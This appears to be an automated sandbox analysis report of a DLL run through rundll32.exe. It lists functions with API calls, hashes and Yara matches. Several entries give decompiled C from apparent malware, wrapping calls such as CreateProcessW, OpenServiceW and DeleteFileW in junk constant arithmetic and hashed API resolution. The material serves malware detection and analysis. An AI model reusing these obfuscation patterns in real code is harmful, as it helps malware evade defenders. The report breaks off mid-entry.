Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalErrorInitializeLastSection
String ID: @Mt
API String ID: 3413597225-1491384996
Opcode ID: fc60a70010c48e9babde1539a8aaf202825b409e41fd01c6ee5f8c00f43f467f
Instruction ID: b4f612010f92a84df1d343f34ba86f7bb8aec96b7948ff7aa8bd12685e53f1ec
Opcode Fuzzy Hash: fc60a70010c48e9babde1539a8aaf202825b409e41fd01c6ee5f8c00f43f467f
Instruction Fuzzy Hash: 40E0C2703443E0C6FB209EF08D087A037D6671230CF21C414E4C5ED580E76AD08E922D

Uniqueness

Uniqueness Score: -1.00%

Function 6EA07BA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,6EA4A8C4), ref: 6EA07BA5
GetLastError.KERNEL32(?,00000000,00000000,?,6EA4A8C4), ref: 6EA07BAF

Strings

@Mt, xrefs: 6EA07BAF

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalErrorInitializeLastSection
String ID: @Mt
API String ID: 3413597225-1491384996
Opcode ID: 1f313738a332ba5d763902f84e1f5679ded6120c7e19150b689e75f90383041a
Instruction ID: 3614de7902420e0e6e646c9c197e66fbfd3dd72dc19da6a0b657e440d0170da5
Opcode Fuzzy Hash: 1f313738a332ba5d763902f84e1f5679ded6120c7e19150b689e75f90383041a
Instruction Fuzzy Hash: 9BC08C70360B6142EF607F718C08B52369C7B43B0AFA8C8A8B00AEC0D0EB7CC441E62C

Uniqueness

Uniqueness Score: -1.00%

Function 6EA173A0, Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,00000000,6EA1226B), ref: 6EA173A5
HeapAlloc.KERNEL32(00000000), ref: 6EA173AC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6EA173F2
HeapFree.KERNEL32(00000000), ref: 6EA173F9

Part of subcall function 6EA1723E: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6EA173E8,00000000), ref: 6EA17262
Part of subcall function 6EA1723E: HeapAlloc.KERNEL32(00000000), ref: 6EA17269

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: e1f4d995c69f0cfbb345f6b80a2cd9b02bb7b36bb9d9b94dbf16b9bcb790494d
Instruction ID: 5a90903ce59fff27914cc4d4c1b36777f8279a4400f3a3ccfe29e1327ff59cf4
Opcode Fuzzy Hash: e1f4d995c69f0cfbb345f6b80a2cd9b02bb7b36bb9d9b94dbf16b9bcb790494d
Instruction Fuzzy Hash: 52F0967254CF215BCF7117F9DC0C9DE2A6AAB836517159418F841DA284DE21C8838798

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6560 Parent PID: 4348 rundll32.exeCOMMON

Executed Functions

Function 6EA062C0, Relevance: 50.5, APIs: 22, Strings: 6, Instructions: 1527COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6EA06328
__aullrem.LIBCMT ref: 6EA06368

Strings

K;(I, xrefs: 6EA0726D, 6EA0766F, 6EA06852, 6EA0732B, 6EA076DE, 6EA06A37, 6EA0788F, 6EA06880, 6EA06B94, 6EA06FBF, 6EA06BE4, 6EA065F5, 6EA06F10, 6EA06C08, 6EA0722B, 6EA071DB, 6EA072D0, 6EA07761
w, xrefs: 6EA073AF
K;(Io, xrefs: 6EA062CC
s, xrefs: 6EA06D10
K;(I, xrefs: 6EA063CA
&, xrefs: 6EA067C3

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv__aullrem
String ID: &$K;(I$K;(I$K;(Io$s$w
API String ID: 3839614884-854860293
Opcode ID: 91b7ec510878dcab316c8dc89a712bdb05977eb71e56ccde887ddeb2624f0c5f
Instruction ID: bd30aa8ee314998c909bb6609b95e790a59eb2c38c8d4e6719748bfd7752292e
Opcode Fuzzy Hash: 91b7ec510878dcab316c8dc89a712bdb05977eb71e56ccde887ddeb2624f0c5f
Instruction Fuzzy Hash: D2D2CC30928B458FC755DF79D18061AB7E5BFCA358F288A2EF485A7350EB31D8C18B46

Uniqueness

Uniqueness Score: -1.00%

Function 6EA057C0, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(6EA00000,000000C9,00000002,00000002,74E00DE0,00000000), ref: 6EA05853

Strings

I, xrefs: 6EA05818
`, xrefs: 6EA05826
L, xrefs: 6EA0583F
{, xrefs: 6EA05838

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FindResource
String ID: I$L$`${
API String ID: 1635176832-477734887
Opcode ID: e26abf6306112d713236494a1958e32bf71cb450ddad13eddc019e6f4035a506
Instruction ID: 077a2fe1cc3848d444ec68ba1d156f74d730ebe5541b4b272d1e56d1afc5fddf
Opcode Fuzzy Hash: e26abf6306112d713236494a1958e32bf71cb450ddad13eddc019e6f4035a506
Instruction Fuzzy Hash: 8A712530E046598BDF18CFBCD9542EDFFB1AF89308F0882A8D555EB295D7349A49CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6EA13250, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 131threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6EA02620: GetTickCount64.KERNEL32 ref: 6EA0262E

GetTickCount64.KERNEL32 ref: 6EA132B2
GetTickCount64.KERNEL32 ref: 6EA132D0
GetTickCount64.KERNEL32 ref: 6EA132E9
GetTickCount64.KERNEL32 ref: 6EA132EB
GetTickCount64.KERNEL32 ref: 6EA132F2
GetTickCount64.KERNEL32 ref: 6EA13310
DisableThreadLibraryCalls.KERNEL32(?,?,?,00000001,?,?,00000001,?,6EA49E00,0000000C,6EA14C4A,?,00000001,?), ref: 6EA13349

Strings

K;(Io, xrefs: 6EA13264

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick$CallsDisableLibraryThread
String ID: K;(Io
API String ID: 2118593989-79920696
Opcode ID: 1e186f8e901a9b501c1d41af5b83ff9f75020b051113644e6cda06275a537147
Instruction ID: ced46534505e8b4ea4fdb88ae110014f959f5719f5d25eba4f17ea9622d79ad8
Opcode Fuzzy Hash: 1e186f8e901a9b501c1d41af5b83ff9f75020b051113644e6cda06275a537147
Instruction Fuzzy Hash: 5051E331D24B04CFDB12EFB8C544799B7B8BF4A354F01861AD886BB201EB71A8C6CB55

Uniqueness

Uniqueness Score: -1.00%

Function 6EA14A48, Relevance: 10.6, APIs: 7, Instructions: 136COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6EA14A8F
___scrt_uninitialize_crt.LIBCMT ref: 6EA14AA9

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: f0c2ab713251d9e30716ab1a7f39b0ee13a75c841ae2e5ec6b6561f1f1799a2a
Instruction ID: 76f0675524ad4cb29faca0a92034917b7ac8d2028036a5b06a37ce1c30dedfa4
Opcode Fuzzy Hash: f0c2ab713251d9e30716ab1a7f39b0ee13a75c841ae2e5ec6b6561f1f1799a2a
Instruction Fuzzy Hash: 7841B372D0C625AFDB209FDDC900BEE3AADEB85B5DF158519E414AB240C7304D838B98

Uniqueness

Uniqueness Score: -1.00%

Function 6EA14AF8, Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 6EA14B35
dllmain_crt_dispatch.LIBCMT ref: 6EA14B4C
dllmain_raw.LIBCMT ref: 6EA14B94
dllmain_crt_dispatch.LIBCMT ref: 6EA14BA7
dllmain_raw.LIBCMT ref: 6EA14BBA

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: b9ef2a1a2d5dacd04281a3792ced9b98fd1007d0780a63a549b35b020a0355bc
Instruction ID: ec59c557ad9e2660d4d1c77335ca583f8c71dd47e5568feb698a04ec73dcdfc6
Opcode Fuzzy Hash: b9ef2a1a2d5dacd04281a3792ced9b98fd1007d0780a63a549b35b020a0355bc
Instruction Fuzzy Hash: BA219175D0D629AFDB615F9DCD40FEF3A6DEB84A9CB054415F814AB214C3308D838B94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2578F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA25842

Strings

K;(Io, xrefs: 6EA257AE, 6EA25808, 6EA25847

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: K;(Io
API String ID: 269201875-79920696
Opcode ID: 22aeae2183a6c0494abb208e950e82b64df3aa4115ace9f010bb4c44c713e70e
Instruction ID: bc5b2ffcbbdbaec801f90e626a3814c6ef779db5e77eb1ad3f782fb545082a39
Opcode Fuzzy Hash: 22aeae2183a6c0494abb208e950e82b64df3aa4115ace9f010bb4c44c713e70e
Instruction Fuzzy Hash: 90318475A00615DF8B04CF9AC4C045DB7F1FF8932072A86A5D929FB364C330AC45DB92

Uniqueness

Uniqueness Score: -1.00%

Function 02F29100, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E02F29100(void* __ecx, WCHAR* __edx, WCHAR* _a8, struct _PROCESS_INFORMATION* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _STARTUPINFOW* _a40, intOrPtr _a44, int _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t52;
				int _t60;
				WCHAR* _t64;

				_t64 = __edx;
				_push(0);
				_push(0);
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E02F18002(_t52);
				_v28 = 0x2905a5;
				_v24 = 0;
				_v12 = 0xa2d8b8;
				_v12 = _v12 + 0xfffff871;
				_v12 = _v12 ^ 0x5b121ec8;
				_v12 = _v12 ^ 0x21b4fd5f;
				_v12 = _v12 ^ 0x7a067dbd;
				_v8 = 0x36027e;
				_v8 = _v8 ^ 0x6c06375b;
				_v8 = _v8 * 0x51;
				_v8 = _v8 + 0xffff0cdd;
				_v8 = _v8 ^ 0x3b3a0501;
				_v20 = 0x3133e6;
				_v20 = _v20 ^ 0xa81fc925;
				_v20 = _v20 ^ 0xa82b7027;
				_v16 = 0x47f0fa;
				_v16 = _v16 | 0xed8e49a9;
				_v16 = _v16 ^ 0xedcdbeb4;
				E02F2E399(__ecx, __edx, __ecx, 0xa2449830, 0x53, 0xa9376bff);
				_t60 = CreateProcessW(_t64, _a8, 0, 0, _a48, 0, 0, 0, _a40, _a16); // executed
				return _t60;
			}

0x02f2910a
0x02f2910c
0x02f2910d
0x02f2910e
0x02f29111
0x02f29114
0x02f29117
0x02f2911a
0x02f2911d
0x02f29120
0x02f29123
0x02f29126
0x02f29127
0x02f2912a
0x02f2912d
0x02f29130
0x02f29133
0x02f29134
0x02f29137
0x02f29138
0x02f29139
0x02f2913a
0x02f2913f
0x02f29149
0x02f2914c
0x02f29153
0x02f2915a
0x02f29161
0x02f29168
0x02f2916f
0x02f29176
0x02f2918e
0x02f29191
0x02f29198
0x02f2919f
0x02f291a6
0x02f291ad
0x02f291b4
0x02f291bb
0x02f291c2
0x02f291d5
0x02f291ef
0x02f291f6

APIs

CreateProcessW.KERNEL32(?,EDCDBEB4,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 02F291EF

Strings

31, xrefs: 02F2919F

Memory Dump Source

Source File: 00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp, Offset: 02F10000, based on PE: true

Yara matches

Similarity

API ID: CreateProcess
String ID: 31
API String ID: 963392458-1099231638
Opcode ID: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction ID: d839539545f233dccff37f04f47451977e6a710cb3e46ba27ea3f70b6391247b
Opcode Fuzzy Hash: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction Fuzzy Hash: 8B31E272801258BBCF559FA6CD05CDFBFB5FB89750F108158FA1462120C3728A60EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F1890E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E02F1890E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t46;
				intOrPtr* _t57;
				void* _t58;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E02F18002(_t46);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x5a89c2;
				_v12 = 0xac9734;
				_t60 = 0xf;
				_v12 = _v12 / _t60;
				_v12 = _v12 + 0xbff0;
				_v12 = _v12 ^ 0x0000f03b;
				_v20 = 0x5d6235;
				_t61 = 0x58;
				_v20 = _v20 * 0x48;
				_v20 = _v20 ^ 0x1a4c6f32;
				_v8 = 0x1651ff;
				_v8 = _v8 / _t61;
				_v8 = _v8 + 0x3de9;
				_v8 = _v8 | 0x9dbfa52d;
				_v8 = _v8 ^ 0x9dbe342b;
				_v16 = 0xc9b349;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 ^ 0x000d61f6;
				_t57 = E02F2E399(_t61, _v8 % _t61, _t61, 0xa2449830, 0x195, 0x5faffbf6);
				_t58 =  *_t57(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0x28, 0, _a20, _a24); // executed
				return _t58;
			}

0x02f18919
0x02f1891b
0x02f1892c
0x02f18931
0x02f18937
0x02f1893e
0x02f1894a
0x02f1894f
0x02f18954
0x02f1895b
0x02f18962
0x02f1896d
0x02f18971
0x02f18974
0x02f1897b
0x02f1898c
0x02f1898f
0x02f18996
0x02f1899d
0x02f189a4
0x02f189ab
0x02f189af
0x02f189cd
0x02f189db
0x02f189e2

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,?,00000036,00000000,00000036), ref: 02F189DB

Strings

5b], xrefs: 02F18962

Memory Dump Source

Source File: 00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp, Offset: 02F10000, based on PE: true

Yara matches

Similarity

API ID: FileHandleInformation
String ID: 5b]
API String ID: 3935143524-2683361797
Opcode ID: 63ccbd5bf9bf2d38dd30339ed70447a321936e4e4c5aac198be4ec8ca5f58e68
Instruction ID: 157e0167e48a8cd8a40fa3764785a9a1d79aa9282ab19ea9c01e37b57faa09e4
Opcode Fuzzy Hash: 63ccbd5bf9bf2d38dd30339ed70447a321936e4e4c5aac198be4ec8ca5f58e68
Instruction Fuzzy Hash: 802168B5E41208BBDB14DF99CD4AAEEBFB5FB40310F108099E914BA280D7B95B159F90

Uniqueness

Uniqueness Score: -1.00%

Function 02F1C38F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
serviceCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E02F1C38F(void* __ecx, int __edx, void* _a4, intOrPtr _a8, short* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t50;
				void* _t59;
				signed int _t61;
				int _t65;

				_push(_a12);
				_t65 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E02F18002(_t50);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x617f6e;
				_v32 = 0x2c9f69;
				_v12 = 0x3d345c;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 << 1;
				_v12 = _v12 + 0xffff1c15;
				_v12 = _v12 ^ 0xfffbc300;
				_v8 = 0x1d3e99;
				_t61 = 0x3e;
				_v8 = _v8 / _t61;
				_v8 = _v8 + 0xcfea;
				_v8 = _v8 ^ 0x5f2ca55f;
				_v8 = _v8 ^ 0x5f2aa82f;
				_v16 = 0xf71959;
				_v16 = _v16 << 0xa;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0xac874e69;
				_v20 = 0x5ac786;
				_v20 = _v20 ^ 0xe6acc0dd;
				_v20 = _v20 ^ 0xe6fddbb7;
				E02F2E399(_t61, _v8 % _t61, _t61, 0x1f1ae65e, 0x5e, 0x42b99377);
				_t59 = OpenServiceW(_a4, _a12, _t65); // executed
				return _t59;
			}

0x02f1c396
0x02f1c399
0x02f1c39b
0x02f1c39e
0x02f1c3a1
0x02f1c3a3
0x02f1c3a8
0x02f1c3ae
0x02f1c3b2
0x02f1c3b9
0x02f1c3c0
0x02f1c3c7
0x02f1c3cb
0x02f1c3ce
0x02f1c3d5
0x02f1c3dc
0x02f1c3e8
0x02f1c3ee
0x02f1c3f1
0x02f1c3f8
0x02f1c3ff
0x02f1c406
0x02f1c40d
0x02f1c411
0x02f1c415
0x02f1c41c
0x02f1c423
0x02f1c42a
0x02f1c44a
0x02f1c459
0x02f1c45f

APIs

OpenServiceW.ADVAPI32(FFFBC300,E6FDDBB7,?,?,?,?,?,?,?,?,02F32FF3,?), ref: 02F1C459

Strings

\4=, xrefs: 02F1C3C0

Memory Dump Source

Source File: 00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp, Offset: 02F10000, based on PE: true

Yara matches

Similarity

API ID: OpenService
String ID: \4=
API String ID: 3098006287-2040901920
Opcode ID: f0bb5145ee7f5cc29076849a53ae227a1e4ca7211b09d7f87376f75b715373d2
Instruction ID: 49c9c4401cf11e49ae96fe49543e6e8c112e490fa051164f9c9426edc20031ec
Opcode Fuzzy Hash: f0bb5145ee7f5cc29076849a53ae227a1e4ca7211b09d7f87376f75b715373d2
Instruction Fuzzy Hash: 672132B6D0020DEBDB04CFE5C909ADEBFB1FB00764F108189E52566250C3BA5B55DF91

Uniqueness

Uniqueness Score: -1.00%

Function 02F24CFD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02F24CFD(void* __ecx, long __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t46;
				void* _t56;
				signed int _t58;
				long _t62;

				_push(_a20);
				_t62 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E02F18002(_t46);
				_v20 = 0x7fa37e;
				_v20 = _v20 | 0x057bdedc;
				_v20 = _v20 + 0xffffffcc;
				_v20 = _v20 ^ 0x057d9e34;
				_v8 = 0x65e94f;
				_t58 = 0x2a;
				_v8 = _v8 * 0x5b;
				_v8 = _v8 + 0xffffa5c0;
				_v8 = _v8 / _t58;
				_v8 = _v8 ^ 0x00d22f9e;
				_v16 = 0xf6ef89;
				_v16 = _v16 + 0x478;
				_v16 = _v16 ^ 0x0b24101f;
				_v16 = _v16 ^ 0x0bdb985c;
				_v12 = 0xb9bed2;
				_v12 = _v12 >> 5;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0xb9b7d5de;
				E02F2E399(_t58, _v8 % _t58, _t58, 0xa2449830, 0x264, 0x8babc312);
				_t56 = RtlAllocateHeap(_a20, _a4, _t62); // executed
				return _t56;
			}

0x02f24d04
0x02f24d07
0x02f24d09
0x02f24d0c
0x02f24d0f
0x02f24d12
0x02f24d15
0x02f24d17
0x02f24d1c
0x02f24d25
0x02f24d2c
0x02f24d30
0x02f24d37
0x02f24d44
0x02f24d48
0x02f24d4b
0x02f24d5c
0x02f24d5f
0x02f24d66
0x02f24d6d
0x02f24d74
0x02f24d7b
0x02f24d82
0x02f24d89
0x02f24d8d
0x02f24d91
0x02f24daf
0x02f24dbe
0x02f24dc4

APIs

RtlAllocateHeap.NTDLL(?,B9B7D5DE,?,?,?,?,?,?,?,?,?,?,?), ref: 02F24DBE

Strings

Oe, xrefs: 02F24D37

Memory Dump Source

Source File: 00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp, Offset: 02F10000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: Oe
API String ID: 1279760036-808228324
Opcode ID: 700dfd9d891cb1a26e26177c6dd2e79faa0fdc2c74feaf985b1bdd3c6d92e912
Instruction ID: f40071e19bcac4087a97d2f45b38597db26a0024e0491e70735566e03c3d1488
Opcode Fuzzy Hash: 700dfd9d891cb1a26e26177c6dd2e79faa0fdc2c74feaf985b1bdd3c6d92e912
Instruction Fuzzy Hash: 34211372C01219FBDF14DFA4C94A8DEBFB1FB00364F108588E92466250D7B68B28EF90

Uniqueness

Uniqueness Score: -1.00%

Function 02F155C0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E02F155C0(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t44;
				int _t56;
				signed int _t58;
				signed int _t59;
				WCHAR* _t65;

				_push(_a4);
				_t65 = __edx;
				_push(__edx);
				E02F18002(_t44);
				_v12 = 0xc09d41;
				_t58 = 0x5c;
				_v12 = _v12 / _t58;
				_v12 = _v12 + 0xffffef63;
				_v12 = _v12 ^ 0xe9e279a7;
				_v12 = _v12 ^ 0xe9e62653;
				_v20 = 0xa2cc51;
				_t59 = 0x34;
				_v20 = _v20 / _t59;
				_v20 = _v20 ^ 0x000b7ed2;
				_v8 = 0xd564b1;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 + 0x176e;
				_v8 = _v8 | 0xf1e3b14c;
				_v8 = _v8 ^ 0xf1e4530b;
				_v16 = 0xd8623f;
				_v16 = _v16 * 0x37;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0xe7d235eb;
				E02F2E399(_t59, _v20 % _t59, _t59, 0xa2449830, 0x246, 0x6ae2bc6b);
				_t56 = DeleteFileW(_t65); // executed
				return _t56;
			}

0x02f155c7
0x02f155ca
0x02f155cc
0x02f155ce
0x02f155d3
0x02f155e1
0x02f155e6
0x02f155eb
0x02f155f2
0x02f155f9
0x02f15600
0x02f1560a
0x02f15610
0x02f15613
0x02f1561a
0x02f15621
0x02f15625
0x02f1562c
0x02f15633
0x02f1563a
0x02f15655
0x02f15658
0x02f1565c
0x02f1566f
0x02f15678
0x02f1567e

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 02F15678

Strings

S&, xrefs: 02F155F9

Memory Dump Source

Source File: 00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp, Offset: 02F10000, based on PE: true

Yara matches

Similarity

API ID: DeleteFile
String ID: S&
API String ID: 4033686569-4232605156
Opcode ID: a789b351c44137b8d7dd019b37ab00909fcc494573d4763fe5f2d1bb6bf47882
Instruction ID: 5f0b9d80e45d82a3d52a49e1ee0990b36b34d931014e4b68cf3b614602b3ff04
Opcode Fuzzy Hash: a789b351c44137b8d7dd019b37ab00909fcc494573d4763fe5f2d1bb6bf47882
Instruction Fuzzy Hash: 1A112370D05318ABDB14DFA4C94A8CEBBB5FB90350F108099E529AB290D7B55B15CF81

Uniqueness

Uniqueness Score: -1.00%

Function 02F1C460, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02F1C460(void* __ecx, void* __edx, void* _a8, void* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t43;
				char _t52;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E02F18002(_t43);
				_v12 = 0x266f4b;
				_v12 = _v12 | 0x563deae8;
				_v12 = _v12 * 0x4d;
				_v12 = _v12 ^ 0xf13e188d;
				_v8 = 0xe0e0e3;
				_v8 = _v8 ^ 0x73e6d5d6;
				_v8 = _v8 + 0xffff5e48;
				_v8 = _v8 ^ 0x26d91c35;
				_v8 = _v8 ^ 0x55dbfde5;
				_v20 = 0x5f084f;
				_v20 = _v20 + 0x941e;
				_v20 = _v20 ^ 0xe99bb6cc;
				_v20 = _v20 ^ 0xe9c87fab;
				_v16 = 0x7e37cb;
				_v16 = _v16 + 0xffff5de5;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0x7d95e9a6;
				E02F2E399(__ecx, __edx, __ecx, 0xa2449830, 0x240, 0x444b06c3);
				_t52 = RtlFreeHeap(_a8, 0, _a12); // executed
				return _t52;
			}

0x02f1c466
0x02f1c469
0x02f1c46c
0x02f1c46f
0x02f1c472
0x02f1c474
0x02f1c475
0x02f1c476
0x02f1c47b
0x02f1c485
0x02f1c49f
0x02f1c4a8
0x02f1c4af
0x02f1c4b6
0x02f1c4bd
0x02f1c4c4
0x02f1c4cb
0x02f1c4d2
0x02f1c4d9
0x02f1c4e0
0x02f1c4e7
0x02f1c4ee
0x02f1c4f5
0x02f1c4fc
0x02f1c500
0x02f1c514
0x02f1c524
0x02f1c529

APIs

RtlFreeHeap.NTDLL(7D95E9A6,00000000,E9C87FAB,?,?,?,?,?,?,?,?,?,?,?), ref: 02F1C524

Strings

=V, xrefs: 02F1C485

Memory Dump Source

